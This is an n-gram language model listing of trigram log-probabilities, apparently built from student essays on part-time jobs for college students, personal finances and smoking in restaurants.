-2.540267 , the result
-2.309394 <s> The result
-0.9303056 suffer ; result
-0.6288116 find it difficult
-0.953659 often be difficult
-0.953659 otherwise be difficult
-2.5062308 is a difficult
-1.9157985 it is difficult
-0.8624173 be often difficult
-1.1791353 is often difficult
-1.3532921 have been difficult
-1.2156701 on learning difficult
-0.7766882 is sometimes difficult
-1.2206115 student can make
-1.5499184 students can make
-1.3933605 This will make
-0.91944873 what will make
-0.91944873 rejection will make
-1.2669928 -RRB- and make
-1.1690505 graduation to make
-1.1690505 working to make
-1.6812965 students to make
-1.7137344 time to make
-1.7304938 have to make
-0.91700035 - to make
-1.5443137 opportunity to make
-1.6753925 them to make
-1.3861098 hard to make
-0.91700035 serve to make
-1.1690505 responsibility to make
-1.4464296 had to make
-1.6156784 it may make
-1.4412558 They should make
-0.9349505 education should make
-0.91316724 : To make
-0.9589776 college people make
-0.7765363 we shall make
-1.401058 the necessary lifestyle
-1.588095 student 's lifestyle
-0.88812464 and adult lifestyle
-0.5415809 a well-rounded lifestyle
-0.8186782 necessary lifestyle adjustment
-0.97038597 graduation and subsequent
-0.7055833 well c A
-2.2928863 job , undertaken
-2.6930532 <s> I still
-2.3320706 , it still
-1.3733281 one can still
-0.9453734 Smokers can still
-1.5606817 smoking is still
-1.7339616 education and still
-2.0070126 students are still
-1.7906784 who are still
-1.3071673 job while still
-0.7721034 undertaken while still
-0.7721034 force while still
-2.0594428 can be quite
-1.704637 could be quite
-2.346868 it is quite
-1.4961355 money is quite
-1.2324202 Money is quite
-1.3664428 and become quite
-0.8447202 in itself quite
-0.9275686 am really quite
-1.9996837 may be helpful
-1.2302085 be very helpful
-1.5210211 is very helpful
-0.43259177 be quite helpful
-1.7711728 , with regard
-0.84458816 in this regard
-1.1430517 <s> With regard
-1.5340397 a valuable exercise
-0.9694239 On a personal
-2.5137737 , the personal
-0.96152246 exercise in personal
-0.96152246 interference in personal
-0.9690776 character and personal
-1.8883668 for their personal
-0.45229593 develop their personal
-1.5833995 student 's personal
-1.6736298 for all personal
-1.0468272 in managing personal
-1.5152411 in my personal
-0.9571265 leave many recent
-1.7011673 <s> Many recent
-0.96841514 market for graduates
-0.9701716 leaving the graduates
-0.9322329 and university graduates
-0.3422419 many recent graduates
-0.3422419 Many recent graduates
-1.1827364 the new graduates
-0.54140407 newly minted graduates
-1.1013368 recent graduates similarly
-0.8884857 not made similarly
-0.96644884 similarly have difficulty
-0.96920437 one is managing
-0.9680422 schedules , managing
-1.2649392 schedule , managing
-1.6342201 experience in managing
-0.9620837 difficulty in managing
-0.97001797 capable of managing
-1.2697304 schedule , finances
-0.7540409 managing their finances
-1.9411652 , if finances
-1.3191152 the family finances
-1.3549973 worry about finances
-0.9568751 organize my finances
-0.9398219 manage his finances
-0.54122734 end unless finances
-1.9587287 have the responsibly
-1.1339874 their finances responsibly
-1.6080055 In many western
-1.6070328 In many countries
-1.7003 <s> Many countries
-0.54166937 many western countries
-1.741608 , this unfortunate
-1.2677655 opinion is unfortunate
-1.7417587 into the reality
-0.7055833 this unfortunate reality
-0.9410907 reality often combines
-2.814478 of the levels
-0.9223705 with high levels
-0.9691483 heavily in debt
-0.96988934 levels of debt
-0.96554226 After college debt
-0.9392116 tolerate future debt
-0.8635832 loans reduce debt
-1.7088678 students with credit
-2.2339926 and the credit
-2.025133 from the credit
-0.9651719 -LRB- on credit
-2.0581024 <s> If credit
-0.5414925 <s> Using credit
-1.406819 to use cards
-0.18498072 with credit cards
-0.2219529 the credit cards
-0.18498072 on credit cards
-0.18498072 If credit cards
-0.18498072 Using credit cards
-1.2558488 , student loans
-0.9697608 combination of loans
-1.4281694 rely on loans
-0.9467303 eliminating -RRB- loans
-0.91394144 upon tuition loans
-0.9215614 but your loans
-1.4248676 friends , etc.
-1.2567804 loans , etc.
-1.2567804 expenses , etc.
-0.54174346 their uniforms etc.
-1.2678738 graduates in grave
-0.9382721 grave financial peril
-0.9694723 proactive in providing
-1.8374015 not only providing
-2.1283512 at the cash
-1.268862 amounts of cash
-0.9141391 managing personal cash
-0.5415809 win substantial cash
-0.8186782 personal cash flow
-2.1315873 at the least
-1.198611 or at least
-0.9332967 provide at least
-1.5227196 gain a small
-1.2467027 least a small
-0.95874107 support a small
-0.8778965 of even small
-0.8778965 to even small
-1.2639482 need for income
-2.4936843 , the income
-1.2155398 of any income
-1.8222682 amount of income
-1.2568778 source of income
-1.5563618 managing their income
-0.86242974 requires additional income
-2.2722275 <s> The income
-1.2447248 for an income
-0.9208348 of extra income
-0.95166093 need some income
-1.2827779 the added income
-0.81679666 much needed income
-0.54078573 a modest income
-0.9614525 income with which
-1.2515422 years , which
-1.4171757 Japan , which
-0.961228 balance , which
-0.9484841 field in which
-0.9484841 years in which
-0.9484841 weekend in which
-0.9654956 dislikes and which
-0.9619294 rent of which
-0.9619294 foremost of which
-0.95544326 real-world experience which
-1.4217638 for work which
-0.88324165 etime f which
-1.2465488 spending money which
-1.3914516 a degree which
-0.8141381 by internships which
-0.914299 are skills which
-0.914299 invaluable skills which
-1.1738577 an environment which
-0.93324715 be doing which
-1.0291562 is something which
-0.7508655 -LRB- something which
-1.201127 these activities which
-0.9545343 professional life which
-1.163163 of responsibilities which
-1.169039 of income which
-1.7485511 real world which
-0.7021345 job `` which
-0.9064653 experience against which
-0.84047526 economic system which
-0.89875686 5-day week which
-0.53937554 bare facts which
-0.53937554 for travel which
-0.53937554 enormous sum which
-0.53937554 other paths which
-0.94261456 passive smoking which
-0.9709693 which to counter
-0.94965845 counter such debts
-2.3998122 , I largely
-1.9602879 This is largely
-1.8452595 which is largely
-1.8195953 , having been
-0.94858307 which has been
-1.4907516 students have been
-0.88019586 -RRB- have been
-1.5289742 they have been
-0.88019586 There have been
-1.285577 would have been
-1.2535058 have never been
-2.0527523 <s> I myself
-2.1590135 college student myself
-1.8677258 <s> I am
-0.6991601 reasons I am
-1.2387333 , I am
-1.301879 and I am
-1.0867988 reason I am
-0.54174346 , gI am
-0.95829105 was more aware
-0.96005267 make people aware
-1.4527256 I am aware
-1.5162457 so many pressures
-1.1623884 the financial pressures
-0.8542603 these financial pressures
-0.9470824 changing social pressures
-1.0065018 financial pressures generated
-0.96367705 efficiently with living
-1.5623999 earn a living
-1.2685182 supplies , living
-1.4373401 fees and living
-1.922509 cost of living
-1.5416551 costs of living
-0.96953917 accustomed to living
-1.2624636 support their living
-0.9627984 rent or living
-1.9517194 student fs living
-1.151753 are still living
-1.3301641 for those living
-1.2409159 all my living
-0.42338336 and daily living
-0.77577734 and general living
-0.9141391 all personal expenses
-0.24906407 with living expenses
-0.24906407 , living expenses
-0.24906407 and living expenses
-0.24906407 their living expenses
-0.24906407 or living expenses
-0.24906407 fs living expenses
-0.24906407 my living expenses
-0.16577952 daily living expenses
-0.24906407 general living expenses
-1.3885677 , these expenses
-1.0921655 to cover expenses
-2.035174 is that these
-1.9145542 Firstly , these
-1.2513483 Often , these
-0.9611286 long , these
-2.015777 <s> In these
-0.9483753 mentioned in these
-0.9483753 explain in these
-0.9483753 himself in these
-0.96668637 first of these
-0.9676804 contrast to these
-0.8200267 <s> For these
-1.736405 away from these
-2.47735 college students these
-1.5103812 Many students these
-0.9619883 less on these
-0.96236163 meaning have these
-1.1744753 seems like these
-2.1023088 to do these
-0.88338435 of done these
-0.88304746 also teach these
-0.9310726 much during these
-0.53928757 of easing these
-0.53928757 of demonstrating these
-1.0402863 to improve these
-1.2662196 to explore these
-0.77335775 must weigh these
-0.87392604 education costs these
-0.8139725 to practice these
-1.2382298 to appreciate these
-1.3690586 <s> All these
-0.8139725 can pass these
-0.53928757 <s> Sometimes these
-0.7020066 of supporting these
-0.53928757 studies across these
-0.53928757 <s> Between these
-0.96771944 expenses are met
-1.2696514 through a combination
-1.2709996 loans , grants
-0.96412337 time with family
-2.1632152 having a family
-2.1483035 of a family
-0.9575682 supporting a family
-2.0281515 of the family
-2.2750762 on the family
-2.6148129 , and family
-0.9208441 and their family
-1.7805 from their family
-0.9634124 grants or family
-0.9381647 entire future family
-0.9132556 typical Japanese family
-1.1368991 a small family
-1.1942613 his own family
-0.8436551 Not every family
-0.9513582 pass these savings
-0.9254347 or family savings
-0.86400133 they usually restrict
-1.4264265 part-time job during
-2.2259097 time job during
-1.4416637 all , during
-0.9541948 only study during
-1.5065908 that working during
-0.9339278 anybody working during
-1.8232969 spend time during
-1.5444248 time work during
-0.9322306 manifest themselves during
-0.816297 's lifestyle during
-1.4665303 too much during
-0.901258 only worked during
-0.92882323 so hard during
-0.54052097 possible wastes during
-0.84018075 important element during
-0.7038017 and unproductive during
-1.0442077 primary goal during
-0.54052097 game playing during
-1.2695354 during a crucial
-0.7775762 and developing crucial
-1.5806134 , this period
-1.4776752 of this period
-2.5231664 is a period
-0.70534635 a crucial period
-0.77729654 this critical period
-2.6242807 of the adult
-1.6449101 all the adult
-1.2680655 independent and adult
-2.3028445 in their adult
-0.6859247 as an adult
-0.8771952 an independent adult
-0.54140407 into functioning adult
-1.6531138 necessary for development
-2.4378812 in the development
-2.2339926 and the development
-1.2684236 growth and development
-0.88792825 their adult development
-0.5414925 the all-round development
-1.5587846 working for earning
-0.96644497 time be earning
-1.4370177 realize that earning
-2.2335522 job , earning
-2.0925746 students , earning
-2.644908 , and earning
-0.9575156 while also earning
-1.8795137 who are earning
-2.5330536 is a constructive
-0.95745695 feel this way
-1.4461042 as a way
-1.5253305 a valuable way
-2.4946861 in the way
-0.9669524 work their way
-2.1798193 , or way
-0.9305789 in no way
-0.54078573 a constructive way
-1.1934878 your own way
-1.2303431 a great way
-1.2303431 the best way
-0.955937 worked my way
-0.9388072 pay his way
-1.566702 way of easing
-1.6733141 , by allowing
-0.970158 pressures and allowing
-0.7054753 , whilst allowing
-1.3835456 job can lead
-1.1245906 This can lead
-0.8352566 drinking can lead
-0.8352566 age can lead
-0.8352566 professor can lead
-0.8352566 minds can lead
-0.9707589 turn , lead
-2.1510117 them to lead
-1.1996679 job may lead
-0.9989068 and may lead
-0.81373477 time may lead
-0.81373477 much may lead
-0.8447202 may ultimately lead
-1.2483399 to an independent
-1.1968005 and become independent
-1.117306 to become independent
-1.245441 a more independent
-0.8834048 become financially independent
-0.7349471 Being financially independent
-0.54174346 a distracter Secondly
-1.6677687 , with regards
-0.9474329 held with regards
-0.93832636 to employment prospects
-1.946188 student is rarely
-0.96240604 income is rarely
-2.387447 they are rarely
-1.3993495 the only factor
-1.2427977 Another important factor
-0.8772552 The second factor
-1.0470304 The last factor
-0.8446352 or negative factor
-1.6759878 the health factor
-2.3548498 for the majority
-1.2536416 For the majority
-1.2536416 probably the majority
-1.3818003 a large majority
-1.2687647 secure a graduate
-1.5662944 majority of graduate
-2.1783223 time to graduate
-1.6845262 when they graduate
-0.7231363 after they graduate
-1.3685749 once they graduate
-0.9109669 until they graduate
-1.4513702 when we graduate
-1.149322 When we graduate
-1.6629506 jobs , professional
-0.9431696 gain any professional
-1.8556898 are in professional
-2.293868 to their professional
-1.8600217 to become professional
-1.6861509 the future professional
-0.541139 bad qualified professional
-0.541139 an educated professional
-0.8872421 can develop professional
-1.2695947 professional and transferable
-1.9229413 that the ability
-2.1553738 to the ability
-1.494154 as the ability
-1.8022914 have the ability
-1.2313393 offer the ability
-1.2705404 age , ability
-0.96840984 assessing their ability
-1.530767 the academic ability
-2.401189 able to communicate
-1.5571167 ability to communicate
-0.96412337 communicate with customers
-1.2644417 value for customers
-2.5949848 of the customers
-0.9660607 form the customers
-0.9567242 -RRB- of customers
-1.679137 number of customers
-0.9567242 myriad of customers
-0.91705203 Exposing restaurant customers
-0.96440566 severe on customers
-2.0443344 <s> If customers
-0.902425 would give customers
-0.70444465 and handling customers
-1.0456167 of non-smoking customers
-0.5409623 , selfish customers
-2.2811744 to be responsible
-1.7093492 become a responsible
-1.5465044 becoming a responsible
-1.2677076 mature and responsible
-1.4084086 of being responsible
-1.365329 and become responsible
-0.70495963 the institutions responsible
-1.2085184 <s> Being responsible
-0.96934706 work is almost
-1.2638347 , are almost
-0.8184666 been given almost
-0.83090454 to academic achievement
-0.83090454 as academic achievement
-1.566702 way of demonstrating
-0.9514415 demonstrating these attributes
-1.5237232 for many aspects
-1.3450549 many other aspects
-1.7614259 of what aspects
-1.8222228 and to enjoy
-0.95223993 also to enjoy
-1.3394618 time to enjoy
-1.0348384 money to enjoy
-1.4993587 allowed to enjoy
-0.96676177 employment they enjoy
-0.95902747 let them enjoy
-0.82289517 to really enjoy
-1.0130177 never really enjoy
-0.7771444 to truly enjoy
-0.9709693 what to expect
-1.726069 jobs that once
-2.1129537 money and once
-1.2100018 workplace relationships once
-1.2445464 working life once
-1.2815046 that were once
-0.8769452 U.S. universities once
-0.7769962 schedule begins once
-1.6817615 on a wider
-0.9587978 meet a wider
-0.9587978 opens a wider
-1.018674 a wider scale
-1.6619699 are a necessity
-0.97025436 matter of necessity
-1.2492541 in an economical
-1.728523 and a sense
-2.4300733 have a sense
-1.9801816 get a sense
-1.653702 a better sense
-0.5414925 an economical sense
-0.81838614 a growing sense
-0.5414925 a false sense
-1.7011673 <s> Many businesses
-0.7775762 whilst allowing businesses
-2.1008365 do not require
-0.7055833 Many businesses require
-1.2313644 a work force
-0.40850976 the work force
-1.6097654 job may force
-1.2409387 It would force
-2.296603 to be flexible
-2.0531116 that is flexible
-2.401189 able to fill
-1.841641 difficult to fill
-1.5458524 as I would
-0.44897684 then I would
-0.9545271 certainly this would
-1.9500425 , it would
-1.5102077 and it would
-1.6901476 think it would
-1.7010955 job that would
-0.9422474 positions that would
-0.9422474 system that would
-2.0711503 a job would
-2.2051377 time job would
-2.3483686 the student would
-1.2601634 nature , would
-0.9656249 approach , would
-2.5060658 , and would
-1.2944659 of study would
-1.6824313 to study would
-1.8645288 , there would
-1.9249262 , students would
-1.5992402 most students would
-0.94027734 more students would
-0.9389061 job then would
-1.0920187 that they would
-1.6954954 , they would
-1.2809557 skills they would
-0.908556 materials they would
-2.09173 <s> This would
-1.6408627 <s> It would
-1.5164719 fs life would
-0.89241326 about finances would
-1.2517449 <s> That would
-0.7022626 yes-or-no answer would
-0.83807516 convenience store would
-1.3936552 <s> Some would
-0.8738569 for books would
-1.2312639 <s> Students would
-1.1360545 or she would
-1.5671607 , we would
-0.8406513 best choice would
-1.2987367 in restaurants would
-1.0395195 at restaurants would
-1.6734388 banning smoking would
-1.6746192 a full-time member
-0.9471815 valuable -RRB- member
-0.47024587 , contributing member
-0.47024587 and contributing member
-1.5677278 member of staff
-2.0686665 <s> In contrast
-0.94298583 many good arguments
-0.9509998 to these arguments
-1.1187351 to both arguments
-0.70534635 two separate arguments
-1.5443585 it can however
-1.2375193 statement , however
-1.3967925 is , however
-0.95398486 stress , however
-1.8244475 college , however
-0.95398486 believe , however
-0.9342479 important reason however
-2.1208038 their studies however
-0.92993075 not ; however
-0.81796503 these arguments however
-1.2980121 student to cope
-0.96602863 <s> it depends
-0.7055833 academic commitments depends
-2.540267 , the situation
-2.145156 <s> This situation
-0.9141391 's personal situation
-1.7006195 their own situation
-0.9447781 is largely determined
-1.3703371 their financial condition
-0.96956015 over a year
-2.448238 for the year
-1.9211686 by the year
-1.4361105 , their year
-1.2365392 the school year
-0.84443927 my final year
-0.8441873 people every year
-0.54122734 the sophomore year
-0.54122734 the 4th year
-2.3040445 and the type
-1.0960984 , any type
-0.87467146 consider any type
-1.2383901 during school builds
-1.7436646 skills , encourages
-1.2076609 a financial stake
-0.7055833 financial `` stake
-1.8797526 pay for education
-2.4779055 for the education
-1.8270977 part of education
-1.122917 cost of education
-1.5261381 years of education
-0.9390712 process of education
-1.4546181 form of education
-1.9779743 in their education
-0.89199555 of their education
-1.2165031 support their education
-0.9599132 leap from education
-0.8157197 good quality education
-1.6563098 high school education
-0.9239322 get an education
-0.9239322 out an education
-0.89484817 <s> college education
-0.6652713 a college education
-0.6597179 their college education
-1.1302321 if college education
-1.5714238 student 's education
-1.7546544 a good education
-1.7897477 one fs education
-1.4761963 as much education
-1.3975381 for my education
-1.0013055 of higher education
-0.7030314 about advanced education
-0.94026667 and proper education
-0.930557 of our education
-0.8152993 in further education
-0.6074765 is tertiary education
-0.6074765 by tertiary education
-0.92707115 improving health education
-0.5399919 an incomplete education
-0.95958614 Doing this prepares
-2.6843307 , and prepares
-2.1969624 for a world
-1.9074329 in the world
-1.9538796 of the world
-0.9279369 experience the world
-1.71755 from the world
-0.9279369 see the world
-0.9279369 explore the world
-1.3281056 about the world
-0.9279369 hold the world
-0.9279369 around the world
-1.2007453 the working world
-0.934454 tedious working world
-1.292153 the work world
-0.53275853 the academic world
-0.7938381 for real world
-0.15899517 the real world
-1.4017866 today fs world
-0.43490395 the adult world
-0.84088486 the ereal world
-0.540874 a fascinating world
-0.540874 at Disney world
-0.540874 the greal world
-2.0943336 they will encounter
-0.8186782 There fre countless
-2.2551448 can be acquired
-1.2248157 The most readily
-0.5417812 most readily apparent
-1.2592605 do with balancing
-0.9708606 handling , balancing
-0.9692625 gained in balancing
-2.6689322 , and balancing
-0.9255064 Skills like prioritization
-0.9710908 prioritization , multitasking
-0.9708606 positions , finding
-1.4405383 helpful in finding
-0.97001797 joys of finding
-2.0622277 student to finding
-1.9676176 important to finding
-1.6107774 necessary for success
-0.9594425 tool for success
-0.9698608 ultimately the success
-0.96880597 element in success
-0.7766882 with considerable success
-1.2030525 their academic success
-0.82991654 on academic success
-1.0470349 to finding success
-0.9315638 fs own success
-0.54122734 to achieve success
-0.96367705 wrong with going
-0.9670334 sleeping , going
-0.9670334 resume , going
-2.098383 are not going
-1.6301045 life and going
-1.2563437 up and going
-0.96398264 open as going
-1.8416505 their time going
-1.7336475 spend time going
-1.3640735 and then going
-0.9198455 particular : going
-0.9627984 homework or going
-0.9654439 offers are going
-0.95399743 bubble when going
-0.7422465 working while going
-1.2892576 is always going
-1.0154324 <s> Balancing going
-1.8729801 the job provides
-0.95888126 hands-on experience provides
-1.6211587 that working provides
-1.4072039 job also provides
-1.7146164 to college provides
-0.9088795 it still provides
-2.2188299 for a perfect
-2.0865924 is the perfect
-0.96742356 provides the perfect
-0.94065106 students valuable training
-2.1250482 is the training
-0.9421236 disagree because training
-0.9442717 the perfect training
-0.81864053 perfect training ground
-0.9446826 a middle ground
-1.4812503 This will improve
-0.9470251 restaurants will improve
-1.5565478 or to improve
-0.96771485 ground to improve
-1.3893086 should help improve
-2.3479266 with the burden
-1.3533711 the financial burden
-0.9442717 and proper burden
-0.5415809 an unnecessary burden
-1.4411428 education is supported
-0.8969924 perhaps fully supported
-0.9705882 daughter to entirely
-1.8324255 is also entirely
-0.70521736 is supported entirely
-0.8421199 or herself entirely
-1.1106899 up smoking entirely
-0.883376 quit smoking entirely
-2.3556416 with the consequence
-2.5504236 , the concept
-0.4452187 have little concept
-2.6428561 of the actual
-0.9672942 so the actual
-0.97014666 background of actual
-2.313727 <s> The actual
-2.0956888 for the cost
-1.8810079 that the cost
-2.0764477 to the cost
-1.9946803 on the cost
-1.4741518 appreciate the cost
-0.94493854 With the cost
-2.3008554 <s> The cost
-1.2333771 the true cost
-1.0055709 the actual cost
-1.1641253 the full cost
-0.81796503 their labor cost
-2.509021 time job ``
-1.2076609 a financial ``
-0.9621588 start working ''
-0.7054753 `` stake ''
-0.87772065 which means ''
-1.4082936 not a place
-1.9420761 to a place
-0.9580987 demand a place
-0.96792346 securing their place
-0.9616804 Governments should place
-1.6580338 the first place
-1.536698 do n't place
-0.8177979 find another place
-0.8631195 learning takes place
-1.2414992 student the importance
-2.2004743 , the importance
-0.45172948 increase the importance
-0.95605206 place the importance
-2.3008554 <s> The importance
-0.93201834 of no importance
-0.81796503 determine its importance
-0.7050885 of utmost importance
-0.54140407 of paramount importance
-1.4852661 things that were
-0.9445174 self that were
-0.9445174 goals that were
-1.7341659 while they were
-1.626673 that you were
-2.0092113 <s> There were
-0.9442683 my parents were
-1.2850596 credit cards were
-1.6628948 they would were
-1.016751 <s> Others were
-0.704702 75 % were
-1.1939255 for classes coming
-1.2616688 income and out
-1.5546552 the most out
-2.1460001 , or out
-1.1664304 by taking out
-1.2296374 will get out
-1.1813774 time going out
-0.5398157 classes coming out
-0.7808267 and go out
-1.1948891 to go out
-0.859884 working far out
-1.0015004 to try out
-0.702775 to round out
-0.702775 to test out
-0.3414728 , hang out
-0.3414728 simply hang out
-0.5398157 and figuring out
-0.5398157 be pointed out
-0.702775 and carry out
-0.5398157 wont burn out
-0.5398157 to move out
-0.5398157 to strike out
-0.5398157 generally fresh out
-0.5398157 as filling out
-0.5398157 they shell out
-0.702775 brother dropped out
-0.5398157 did drop out
-1.3550227 of their own
-1.4718647 to their own
-1.6967505 on their own
-0.85092443 pay their own
-0.85092443 make their own
-0.85092443 earning their own
-0.85092443 balancing their own
-0.85092443 getting their own
-0.85092443 given their own
-0.85092443 regarding their own
-0.8052187 pay your own
-0.8052187 earning your own
-1.8126075 one fs own
-0.95725083 put my own
-1.1998152 on our own
-1.0764849 on his own
-0.862786 starting his own
-1.7034411 their own pockets
-1.942977 This is where
-1.2497855 That is where
-1.2538766 So , where
-0.9624228 exists , where
-0.9624228 carrels , where
-1.9307867 work and where
-1.8555001 idea of where
-1.2672161 close to where
-0.8161305 offer internships where
-0.92222655 this environment where
-0.9546953 that fs where
-0.59713745 a place where
-0.54043275 unique environments where
-1.4750497 their lives where
-0.8859583 the point where
-0.54043275 some departments where
-0.7036732 hour meetings where
-0.8755528 always choose where
-0.54043275 and colleagues where
-0.8161305 are places where
-0.9650865 experience can contribute
-2.5878587 students to contribute
-2.3999302 able to contribute
-1.5598985 understand that giving
-1.2707431 lectures , giving
-0.95838577 and by giving
-1.8235195 and the value
-1.9630382 of the value
-1.1905922 even the value
-1.3305935 understanding the value
-1.3305935 about the value
-0.13041002 learn the value
-0.30894706 understand the value
-1.4222126 appreciate the value
-0.9289252 taught the value
-0.8633952 some educational value
-1.2338123 the true value
-1.5514445 the real value
-0.79486597 their real value
-0.5414925 it promotes value
-1.3590684 students often find
-2.2158425 students to find
-1.8773354 time to find
-1.7683856 important to find
-1.6764584 difficult to find
-0.31948218 possible to find
-1.2143741 tend to find
-0.9417827 ourselves to find
-1.5188104 Many students find
-0.95767075 If students find
-2.279232 students should find
-2.19944 , or find
-1.2194401 may even find
-0.9086736 and still find
-0.95902765 ease this transition
-1.5597583 preparation for transition
-2.4317107 , the transition
-1.2628484 ease the transition
-1.8624588 difficult to transition
-0.9037439 a difficult transition
-2.797555 of the campus
-1.2545568 banned from campus
-0.9210864 time on campus
-0.9210864 classes on campus
-0.9210864 groups on campus
-1.7765818 the college campus
-1.7831396 <s> College campuses
-0.96771944 campuses are unique
-0.5417812 are unique environments
-1.2704892 where the passion
-0.96308273 comparison with learning
-0.9582207 passion for learning
-1.2456934 essential for learning
-0.9601871 consider is learning
-1.8285966 which is learning
-2.5570314 of the learning
-2.255887 on the learning
-1.8969117 example , learning
-1.6941365 people , learning
-1.2536815 customers , learning
-2.0396304 money and learning
-1.4269952 ; and learning
-1.987281 part of learning
-0.9605465 evolved from learning
-0.96344465 Such as learning
-0.94567895 possible on learning
-1.3741469 focused on learning
-1.4269013 available time learning
-2.3259914 they are learning
-1.3475969 have been learning
-0.8853834 create great learning
-1.0023263 of higher learning
-0.8857858 what point learning
-0.8398291 to mention learning
-0.8398291 <s> Whether learning
-1.2695947 learning and discovery
-0.96771944 discovery are cultivated
-1.5691162 only to continue
-0.86392206 that colleges continue
-0.9709693 continue to maintain
-1.3747886 and can explore
-1.3747886 one can explore
-1.4071077 begin to explore
-1.9875093 them to explore
-1.4071077 begins to explore
-0.9576777 whom to explore
-1.5875494 <s> To explore
-1.1014369 can explore talents
-1.5667721 In the interests
-0.95657855 fs many interests
-0.96979755 talents and interests
-0.92481416 discover new interests
-0.70521736 his changing interests
-2.108051 , a full
-1.2449429 taking a full
-1.9765332 get a full
-2.4757087 to the full
-1.4320285 pay the full
-1.713674 are many full
-0.9693753 challenges of full
-0.9675995 reach their full
-1.2517172 while working full
-2.2952802 to work full
-0.9651177 post college full
-1.232292 they enter full
-1.1649166 the full extent
-0.7775762 a certain extent
-0.9697437 have , without
-0.95642704 get by without
-0.94173986 smoking -LRB- without
-1.421288 a career without
-0.9226517 smoke-free environment without
-0.77562577 's abilities without
-0.93438506 stressful enough without
-0.89472914 they earn without
-1.3491616 in society without
-0.92302394 small family without
-1.6327894 of education without
-0.93611366 several things without
-1.0971998 for us without
-0.8615437 well live without
-0.5406091 nice meal without
-1.641063 and not worrying
-0.92542505 abilities without worrying
-1.2497855 experience is about
-0.96032685 learn is about
-1.6831667 the part about
-0.8865227 invaluable knowledge about
-0.95706904 be all about
-1.5171707 teaches them about
-1.2128345 on learning about
-0.34177178 not worrying about
-0.34177178 without worrying about
-0.89167774 and learn about
-1.5755811 to learn about
-0.6845026 valuable lessons about
-0.6845026 practical lessons about
-0.94247115 cared much about
-0.81645405 valuable insight about
-0.7036732 be brought about
-0.7753227 have studied about
-0.9195662 and right about
-0.7036732 of thinking about
-0.54043275 is worried about
-0.23553617 to worry about
-1.2591032 work can translate
-1.4147173 experience may translate
-0.96587366 job not directly
-0.7054753 can translate directly
-0.54166937 particularly ones directly
-1.5671173 into a salable
-0.5417812 a salable product
-1.0928776 , particularly ones
-0.94100183 jobs often expose
-2.0002522 important to expose
-2.7109714 <s> I partially
-0.9519091 if only partially
-0.96873605 world that awaits
-2.3173888 <s> The answer
-0.54174346 , yes-or-no answer
-1.2483442 to this question
-2.027929 job in question
-0.96952754 question is subjective
-1.8089019 <s> A blanket
-0.9710908 blanket , yes-or-no
-1.7433472 not to overlook
-0.95589554 answer would overlook
-1.7965453 statement for various
-1.2694774 overlook the various
-1.52377 teaches them various
-1.5154113 to enjoy various
-0.9429879 carry out various
-1.5687699 <s> These factors
-0.7774487 various relevant factors
-0.89751804 of these factors
-0.89751804 weigh these factors
-1.2586737 working with different
-1.8578542 at a different
-0.8632097 in completely different
-0.7431135 are very different
-1.2605671 , have different
-1.7092757 that are different
-0.955036 Japan are different
-2.4471095 in a limited
-1.8517852 time is limited
-2.3479266 with the limited
-2.1229475 are not limited
-1.1528965 , school supplies
-0.90788525 afford school supplies
-2.5528169 , the probable
-0.970327 carefully the impact
-0.5414925 the probable impact
-0.8774103 , beneficial impact
-0.6090649 decidedly negative impact
-0.6090649 negligible negative impact
-0.5414925 will negatively impact
-1.7131681 time and energy
-0.9657898 momentum and energy
-1.5604138 all their energy
-0.70563835 the resulting reduction
-2.4458141 of their effectiveness
-1.97698 student fs effectiveness
-1.5670048 studying and completing
-2.4394312 of their assignments
-0.96484846 time or assignments
-0.5415809 and completing assignments
-0.92209035 our class assignments
-1.5687809 as the relevance
-0.5417812 <s> Considerations pertaining
-0.96771944 factors are fairly
-0.54174346 are fairly straightforward
-0.54174346 is pretty straightforward
-0.96829027 made for either
-0.9687765 hour is either
-2.4179401 the student either
-2.133676 related to either
-1.2536224 money from either
-0.9506083 not help either
-1.1628406 was always either
-1.6473862 because it requires
-2.094728 <s> It requires
-0.87743556 student either requires
-0.5415809 <s> Training requires
-2.3723423 , I support
-0.96368796 parents can support
-0.967438 reasons that support
-1.9672656 money , support
-1.7238734 education , support
-1.4966071 reasons to support
-2.1043668 able to support
-1.8070188 need to support
-0.9514575 income to support
-1.2326771 afford to support
-1.6324286 parents or support
-1.5203718 I do support
-0.89502466 or fully support
-0.84088486 I firmly support
-0.7760808 I shall support
-0.540874 I emphatically support
-0.540874 to adequately support
-2.347839 a job rises
-0.97038597 rises and falls
-0.96952105 falls in relation
-1.4290076 is it second
-0.9696964 inhaling a second
-2.6002233 to the second
-1.2699327 focus , second
-2.4829874 , and second
-1.2587898 independent and second
-2.2966485 <s> The second
-0.89201117 <s> My second
-1.5454717 because I never
-1.2582055 there will never
-1.3263907 that have never
-0.92725366 college have never
-1.7850908 they have never
-0.8632945 I say never
-1.3802235 I could never
-1.2397053 , would never
-0.92471147 but had never
-1.3864597 restaurant is too
-1.9815063 It is too
-1.3864597 education is too
-0.9671342 important , too
-0.9671342 environment , too
-0.964117 maybe not too
-1.6322821 taking on too
-0.8950865 smells bad too
-1.2037125 job are too
-1.5146104 and are too
-1.9578663 There are too
-2.0015206 their parents too
-0.9577573 it all too
-2.0398405 <s> If too
-0.9567826 enjoy life too
-1.204543 place where too
-1.5182676 <s> But too
-1.1157391 is perhaps too
-1.9599059 be a great
-2.249643 is a great
-0.95823145 experience a great
-2.6580505 it is great
-0.9701716 digesting the great
-1.2114671 can make great
-1.3338006 are too great
-0.54140407 can create great
-0.9444466 great -LRB- relative
-1.4058527 more important relative
-1.1476102 <s> In addition
-0.9395331 ; in addition
-1.2101696 classes in addition
-1.456134 them in addition
-0.9395331 about in addition
-2.3159316 to their scholastic
-1.886639 should not keep
-0.9583013 fs also keep
-1.2127582 they must keep
-2.0850334 is the last
-0.9672942 until the last
-1.8674259 that will last
-1.8494825 <s> The last
-0.9281723 a less complicated
-1.5695815 the most complicated
-0.9703562 requires a determination
-1.2350495 the true determination
-0.9671011 not they stand
-0.93476766 make our stand
-1.438136 to that particular
-1.5480503 from a particular
-0.9655088 when a particular
-0.9441276 entering any particular
-0.9692625 skill in particular
-1.6777825 in a convenience
-0.96161425 example at convenience
-0.3807505 a convenience store
-1.6633965 smoke , someone
-0.97023827 value to someone
-2.051164 <s> If someone
-0.9136732 you go someone
-0.8176309 to serve someone
-0.8176309 sometimes determine someone
-0.8176309 preferred over someone
-1.0051168 the efforts someone
-0.9696964 studied a business
-0.94005394 make valuable business
-0.97055566 problems , business
-0.94945806 someone studying business
-0.9642324 house or business
-0.93864715 knowledge about business
-0.70495963 restaurants ' business
-1.5704347 needs to weigh
-1.8913591 they should weigh
-1.3614974 student must weigh
-0.9656403 good and decide
